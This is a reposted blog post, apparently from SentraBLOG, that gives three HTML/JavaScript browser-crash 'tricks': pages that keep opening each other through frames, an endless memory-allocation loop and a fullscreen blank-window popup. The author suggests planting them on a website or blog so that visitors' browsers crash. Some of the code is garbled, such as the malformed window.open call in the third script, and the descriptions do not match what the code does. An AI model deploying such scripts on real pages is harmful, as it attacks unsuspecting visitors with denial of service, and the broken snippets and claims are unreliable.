Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

Make a Browser Crash and Hank With Infinite Frame, Memory Hog and The White Screen Of Death

Previously I had to post "Crashing With Infinite Alert Box Browser and Infite Open Window". Well this time I will continue my tricks before but in different ways ie Creating a Browser With Infinite Hank Frame, Memory Hog and The White Screen Of Death. Tricks - tricks and tricks before you can apply on a website or blog, so when other people will access the page they will crash the browser and the hank. Okay just started, the following trick:

Trick I. Infite Frame and iFrame

  1. Open Notepad, and then type the following script


    script frame.html:
    <html><body>
    <script>
    window.open("iframe.html", "iframewind");
    </script>
    </body></html>

    script iFrame.html:
    <html><body>
    <frame src="frame.html">
    </body></html>
  2. Save As with ekstention .html 
  3. Then open the saved file using Mozilla or IE, the browser crashes beware ..... hahahaa yes.
This script will display an alert box can not be closed.

Trick 2. Memory Hog

  1. Open Notepad, and then type the following scriptSave As with the extension.
    <html><body>
    <script>
    var i, one_meg, memory;
    one_meg="123456789ABCDEF";
    for (i = 4; i <= 20;i++) {
    one_meg += one_meg;
    }
    memory = one_meg;
    while(1) {
    memory += one_meg;
    }
    </script>
    </body></html>
  2. Save As with the html extension.
This script can not allocate memory to be left over, if on windows 9x will cause a crash.

Trick 3. White Screen of the Death

Same way as above, type the following script and save, the following script.

<html><body>
<script>
mywind = window.open("death.html", "full");
"fullscreen=yes,location=no,menubar=no,resizeable=no,scrollbars=no,toolbars=no,left=1,top=1,screenX
=1,screenY=1,width="+window.screen.width+",height="+window.screen.oprn.height
);
</script>
<body></html>

This script will make the browser display a blank white.


This post first appeared on SentraBLOG, please read the originial post: here

Share the post

Make a Browser Crash and Hank With Infinite Frame, Memory Hog and The White Screen Of Death

×

Subscribe to Sentrablog

Get updates delivered right to your inbox!

Thank you for your subscription

×